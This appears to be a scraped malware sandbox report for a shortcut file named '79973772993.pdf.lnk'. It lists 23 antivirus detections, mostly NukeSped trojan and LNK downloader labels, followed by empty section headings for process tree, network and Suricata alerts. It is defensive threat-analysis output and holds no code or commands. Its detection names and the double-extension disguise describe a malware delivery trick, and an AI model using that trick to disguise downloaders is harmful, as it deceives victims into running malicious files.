File has been identified by 23 AntiVirus engines on VirusTotal as malicious (23 events)

Lionic	Trojan.WinLNK.Nukesped.4!c
Cynet	Malicious (score: 99)
ALYac	Trojan.Agent.LNK.Gen
Sangfor	Trojan.Generic-LNK.Save.64f1e997
Symantec	MSH.Downloader
ESET-NOD32	LNK/NukeSped.T
Avast	LNK:Nukesped-A [Trj]
Kaspersky	HEUR:Trojan.Multi.GenBadur.genw
F-Secure	Malware.LNK/Dldr.Agent.VPSO
Sophos	Troj/DownLnk-X
Google	Detected
Avira	LNK/Dldr.Agent.VPSO
Microsoft	Trojan:Win32/WinLNK.HNM!MTB
ZoneAlarm	HEUR:Trojan.Multi.GenBadur.genw
GData	Win32.Trojan.Agent.C13ULI
Varist	LNK/Powershell.AL.gen!Eldorado
AhnLab-V3	Downloader/LNK.Generic.S2541
VBA32	suspected of Trojan.Link.URL
Zoner	Probably Heur.LNKScript
Tencent	Win32.Trojan.Agent.Zmhl
SentinelOne	Static AI - Suspicious LNK
Fortinet	LNK/Agent.BCJ!tr
AVG	LNK:Nukesped-A [Trj]

79973772993.pdf.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All